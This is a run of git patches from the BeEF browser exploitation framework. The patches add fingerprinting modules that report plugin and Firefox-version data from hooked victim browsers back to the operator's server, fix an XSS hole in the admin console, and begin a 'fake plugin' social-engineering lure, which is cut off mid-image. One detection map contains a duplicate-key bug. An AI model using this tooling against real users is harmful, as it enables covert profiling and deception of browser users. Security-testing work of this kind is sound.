 		var has_java           = zombie_array[index]["has_java"];
@@ -48,6 +49,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
+		balloon_text+= "<br/>Unity Web Player: " + has_unity;
 		balloon_text+= "<br/>Java: "           + has_java;
 		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 2051dd7cc..03c01669c 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -291,6 +291,7 @@ class ShellInterface
 
         # Browser Components
         ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Unity Web Player',   'HasUnity'],
         ['Browser Components', 'Java',               'JavaEnabled'],
         ['Browser Components', 'VBScript',           'VBScriptEnabled'],
         ['Browser Components', 'PhoneGap',           'HasPhonegap'],
diff --git a/modules/browser/detect_unity/command.js b/modules/browser/detect_unity/command.js
new file mode 100644
index 000000000..304766b2d
--- /dev/null
+++ b/modules/browser/detect_unity/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasUnity())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity="+result);
+
+});
+
diff --git a/modules/browser/detect_unity/config.yaml b/modules/browser/detect_unity/config.yaml
new file mode 100644
index 000000000..350ec01b4
--- /dev/null
+++ b/modules/browser/detect_unity/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_unity:
+            enable: true
+            category: "Browser"
+            name: "Detect Unity Web Player"
+            description: "This module will check if the browser has Unity support."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_unity/module.rb b/modules/browser/detect_unity/module.rb
new file mode 100644
index 000000000..70575825d
--- /dev/null
+++ b/modules/browser/detect_unity/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_unity < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['unity'] = @datastore['unity']
+		save content
+	end
+
+end

From f6ebe9fac05dcf7af78d01ea64e1916dd01e194a Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Mon, 1 Jul 2013 10:11:20 +0200
Subject: [PATCH 338/397] Revert "Add Unity Web Player detection"

This reverts commit 696e3715feb1ae1ab226c7d8f2df954769e5b5dc.
---
 core/main/client/browser.js                   | 48 -------------------
 core/main/handlers/browserdetails.rb          |  8 ----
 .../admin_ui/controllers/modules/modules.rb   |  1 -
 .../admin_ui/controllers/panel/panel.rb       |  2 -
 .../media/javascript/ui/panel/ZombiesMgr.js   |  2 -
 extensions/console/lib/shellinterface.rb      |  1 -
 modules/browser/detect_unity/command.js       | 14 ------
 modules/browser/detect_unity/config.yaml      | 15 ------
 modules/browser/detect_unity/module.rb        | 14 ------
 9 files changed, 105 deletions(-)
 delete mode 100644 modules/browser/detect_unity/command.js
 delete mode 100644 modules/browser/detect_unity/config.yaml
 delete mode 100644 modules/browser/detect_unity/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index f05f13b83..5b427ffb3 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1094,47 +1094,6 @@ beef.browser = {
         }
     },
 
-    /**
-     * Checks if the zombie has the Unity Web Player plugin installed.
-     * @return: {Boolean} true or false.
-     *
-     * @example: if ( beef.browser.hasUnity() ) { ... }
-     */
-    hasUnity:function () {
-
-        var unity = false;
-
-        // Not Internet Explorer
-        if (!this.type().IE) {
-	
-			if (navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
-	            navigator.plugins &&
-				navigator.plugins["Unity Player"]) {
-					
-					unity = true;
-					
-				}
-
-            // Internet Explorer
-        } else {
-
-            try {
-
-                var qt_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
-
-            } catch (e) {
-            }
-
-            if (qt_test) {
-                unity = true;
-            }
-
-        }
-
-        return unity;
-
-    },
-
     /**
      * Checks if the zombie has the QuickTime plugin installed.
      * @return: {Boolean} true or false.
@@ -1586,11 +1545,6 @@ beef.browser = {
                     version = control.getVariable('$version').substring(4);
                     return 'Flash Player v' + version.replace(/,/g, ".");
                 }},
-		    'Unity':{
-                'control':'UnityWebPlayer.UnityWebPlayer.1',
-                'return':function (control) {
-                    return 'Unity Web Player';
-                }},
             'Quicktime':{
                 'control':'QuickTime.QuickTime',
                 'return':function (control) {
@@ -1704,7 +1658,6 @@ beef.browser = {
         var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
         var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
         var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
-        var has_unity        = (beef.browser.hasUnity()) ?        "Yes" : "No";
         var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
         var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
         var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
@@ -1752,7 +1705,6 @@ beef.browser = {
         if (java_enabled) details['JavaEnabled'] = java_enabled;
         if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
         if (has_flash) details['HasFlash'] = has_flash;
-		if (has_unity) details['HasUnity'] = has_unity;
         if (has_phonegap) details['HasPhonegap'] = has_phonegap;
         if (has_web_socket) details['HasWebSocket'] = has_web_socket;
         if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index a32ed7244..46a3b610d 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -222,14 +222,6 @@ module BeEF
           else
             self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
           end
-          
-          # get and store the yes|no value for HasUnity
-          has_unity = get_param(@data['results'], 'HasUnity')
-          if BeEF::Filters.is_valid_yes_no?(has_unity)
-            BD.set(session_id, 'HasUnity', has_unity)
-          else
-            self.err_msg "Invalid value for HasUnity returned from the hook browser's initial connection."
-          end
 
           # get and store the yes|no value for HasPhonegap
           has_phonegap = get_param(@data['results'], 'HasPhonegap')
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 58c7ecfd8..7e8f5a280 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -75,7 +75,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
         # Browser Components
         ['Browser Components', 'Flash',              'HasFlash'],
-        ['Browser Components', 'Unity Web Player',   'HasUnity'],
         ['Browser Components', 'Java',               'JavaEnabled'],
         ['Browser Components', 'VBScript',           'VBScriptEnabled'],
         ['Browser Components', 'PhoneGap',           'HasPhonegap'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index e02938af3..255deef34 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -85,7 +85,6 @@ module BeEF
             hw_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
             domain          = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
             has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
-            has_unity       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasUnity')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
@@ -112,7 +111,6 @@ module BeEF
                 'hw_icon'         => hw_icon,
                 'hw_name'         => hw_name,
                 'has_flash'       => has_flash,
-                'has_unity'       => has_unity,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 68c314a8e..edcb09c5e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -24,7 +24,6 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var domain             = zombie_array[index]["domain"];
 		var port               = zombie_array[index]["port"];
 		var has_flash          = zombie_array[index]["has_flash"];
-		var has_unity          = zombie_array[index]["has_unity"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
@@ -49,7 +48,6 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-		balloon_text+= "<br/>Unity Web Player: " + has_unity;
 		balloon_text+= "<br/>Java: "           + has_java;
 		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 03c01669c..2051dd7cc 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -291,7 +291,6 @@ class ShellInterface
 
         # Browser Components
         ['Browser Components', 'Flash',              'HasFlash'],
-        ['Browser Components', 'Unity Web Player',   'HasUnity'],
         ['Browser Components', 'Java',               'JavaEnabled'],
         ['Browser Components', 'VBScript',           'VBScriptEnabled'],
         ['Browser Components', 'PhoneGap',           'HasPhonegap'],
diff --git a/modules/browser/detect_unity/command.js b/modules/browser/detect_unity/command.js
deleted file mode 100644
index 304766b2d..000000000
--- a/modules/browser/detect_unity/command.js
+++ /dev/null
@@ -1,14 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-
-	var result = (beef.browser.hasUnity())? "Yes" : "No";
-
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity="+result);
-
-});
-
diff --git a/modules/browser/detect_unity/config.yaml b/modules/browser/detect_unity/config.yaml
deleted file mode 100644
index 350ec01b4..000000000
--- a/modules/browser/detect_unity/config.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        detect_unity:
-            enable: true
-            category: "Browser"
-            name: "Detect Unity Web Player"
-            description: "This module will check if the browser has Unity support."
-            authors: ["gcattani"]
-            target:
-                working: ["All"]
diff --git a/modules/browser/detect_unity/module.rb b/modules/browser/detect_unity/module.rb
deleted file mode 100644
index 70575825d..000000000
--- a/modules/browser/detect_unity/module.rb
+++ /dev/null
@@ -1,14 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Detect_unity < BeEF::Core::Command
-
-	def post_execute
-		content = {}
-		content['unity'] = @datastore['unity']
-		save content
-	end
-
-end

From f869d2924aea48b336e84b7887c915f59b9a1844 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 1 Jul 2013 15:24:36 +0100
Subject: [PATCH 339/397] Fixed an XSS discovered by Mario in the default
 keylogger.

---
 extensions/admin_ui/media/javascript/ui/panel/DataGrid.js | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
index 2a8caae48..722c2638d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",

From 7f1473ccbf63321ef8851bea9a7fb59b2176a9e0 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 1 Jul 2013 17:32:00 +0100
Subject: [PATCH 340/397] Added detection for Firefox 22 (and improved
 detection of FF 21/22 with a new DOM object).

---
 core/main/client/browser.js | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 5b427ffb3..912c2783c 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -257,7 +257,15 @@ beef.browser = {
      * @example: beef.browser.isFF21()
      */
     isFF21:function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
+    /**
+     * Returns true if FF22
+     * @example: beef.browser.isFF21()
+     */
+    isFF22:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
     },
 
     /**
@@ -265,7 +273,7 @@ beef.browser = {
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22();
     },
 
     /**
@@ -695,6 +703,7 @@ beef.browser = {
             FF19:this.isFF19(), // Firefox 19
             FF20:this.isFF20(), // Firefox 20
             FF21:this.isFF21(), // Firefox 21
+            FF22:this.isFF22(), // Firefox 22
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -949,8 +958,10 @@ beef.browser = {
         if (this.isFF21()) {
             return '21'
         }
-        ;    // Firefox 21
-
+        ;    // Firefox 22
+        if (this.isFF22()) {
+            return '22'
+        };
         if (this.isIE6()) {
             return '6'
         }

From 3705009982a91e03985fb9778133ff8960550cf2 Mon Sep 17 00:00:00 2001
From: BWZ <ben@delonge.com.au>
Date: Tue, 2 Jul 2013 18:19:34 +1000
Subject: [PATCH 341/397] LiveCD - updade bundles during beef update

Fixes #918
---
 liveCD/BeEFLive.sh | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 49171de03..ef4bb368d 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -189,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
 		#

From af6cf9e5d4be3803157a790017c4fe21c96cd78d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Jul 2013 07:39:23 +0930
Subject: [PATCH 342/397] Add Firefox 23 and 24 support for Firefox aurora/beta
 users

Firefox 23 ETA August 2013
Firefox 24 ETA September 2013
---
 core/main/client/browser.js | 36 ++++++++++++++++++++++++++++++++----
 1 file changed, 32 insertions(+), 4 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 912c2783c..7e100f0d5 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -262,18 +262,34 @@ beef.browser = {
 
     /**
      * Returns true if FF22
-     * @example: beef.browser.isFF21()
+     * @example: beef.browser.isFF22()
      */
     isFF22:function () {
         return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
     },
 
+    /**
+     * Returns true if FF23
+     * @example: beef.browser.isFF23()
+     */
+    isFF23:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
+    },
+
+    /**
+     * Returns true if FF24
+     * @example: beef.browser.isFF24()
+     */
+    isFF24:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
+    },
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24();
     },
 
     /**
@@ -704,6 +720,8 @@ beef.browser = {
             FF20:this.isFF20(), // Firefox 20
             FF21:this.isFF21(), // Firefox 21
             FF22:this.isFF22(), // Firefox 22
+            FF22:this.isFF23(), // Firefox 23
+            FF22:this.isFF24(), // Firefox 24
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -958,10 +976,20 @@ beef.browser = {
         if (this.isFF21()) {
             return '21'
         }
-        ;    // Firefox 22
+        ;    // Firefox 21
         if (this.isFF22()) {
             return '22'
-        };
+        }
+        ;   // Firefox 22
+        if (this.isFF23()) {
+            return '23'
+        }
+        ;   // Firefox 23
+        if (this.isFF24()) {
+            return '24'
+        }
+        ;   // Firefox 24
+
         if (this.isIE6()) {
             return '6'
         }

From 4fe51dcd2880b1bd06a7f490fc3aa30bac1621c2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Jul 2013 08:17:17 +0930
Subject: [PATCH 343/397] Update version to '0.4.4.6.1-alpha' bug fix edition

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 11ac0da8e..a22443b34 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.7-alpha
+0.4.4.6.1-alpha
diff --git a/config.yaml b/config.yaml
index a70f427f2..716b94acb 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.7-alpha'
+    version: '0.4.4.6.1-alpha'
     debug: false
 
     restrictions:

From 9daacd799ef0084fded21b06c0fac66ade8c3c1c Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Jul 2013 08:20:05 +0930
Subject: [PATCH 344/397] Update version to beef-0.4.4.7

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index a22443b34..11ac0da8e 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.6.1-alpha
+0.4.4.7-alpha
diff --git a/config.yaml b/config.yaml
index 716b94acb..a70f427f2 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.6.1-alpha'
+    version: '0.4.4.7-alpha'
     debug: false
 
     restrictions:

From 1bddb00ec8b819d37300e84f386b358fa198285a Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Jul 2013 11:54:52 +0930
Subject: [PATCH 345/397] Add Replace Video (Fake Plugin) module

Fix issue #695
---
 .../replace_video_fake_plugin/command.js      |  14 ++++++++++
 .../replace_video_fake_plugin/config.yaml     |  15 +++++++++++
 .../replace_video_fake_plugin/module.rb       |  24 ++++++++++++++++++
 .../plugins-required.png                      | Bin 0 -> 11310 bytes
 4 files changed, 53 insertions(+)
 create mode 100644 modules/social_engineering/replace_video_fake_plugin/command.js
 create mode 100644 modules/social_engineering/replace_video_fake_plugin/config.yaml
 create mode 100644 modules/social_engineering/replace_video_fake_plugin/module.rb
 create mode 100644 modules/social_engineering/replace_video_fake_plugin/plugins-required.png

diff --git a/modules/social_engineering/replace_video_fake_plugin/command.js b/modules/social_engineering/replace_video_fake_plugin/command.js
new file mode 100644
index 000000000..9a0fc469b
--- /dev/null
+++ b/modules/social_engineering/replace_video_fake_plugin/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	$j('<%= @jquery_selector %>').each(function(){
+		var width = $j(this).css('width');
+		var height = $j(this).css('height');
+		$j(this).replaceWith('<img src="data:image/png;base64,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